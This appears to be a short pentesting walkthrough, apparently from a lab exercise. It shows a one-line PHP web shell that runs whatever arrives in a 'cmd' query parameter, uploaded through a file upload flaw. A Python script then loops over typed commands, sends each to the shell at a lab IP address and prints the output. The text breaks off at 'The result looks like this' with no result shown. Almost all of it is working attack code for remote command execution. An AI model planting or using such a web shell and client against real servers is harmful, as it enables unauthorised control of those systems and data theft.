Suppose you are pentesting a web app and you have found a file upload vulnerability and have successfully uploaded a php file that has this content:
<?php echo shell_exec($_GET['cmd']); ?>
Everytime you need to execute command to find out more about the system that hosts that web app you may need to do something like this:

I am writing a python code which simply throws up results to the terminal, the code looks like this.
import requests # change your url accordingly to where your <?php echo shell_exec($_GET['cmd']); ?> is uploaded to. url = "http://10.10.10.6/torrent/upload/194c4c7e769cc2a5bb902d6d40a8c34238cf4a22.php" try: while True: cmd = input("> ") response = requests.post(url, params={"cmd": cmd}) print(response.text) except KeyboardInterrupt as e: print("bye!")
The result looks like this.
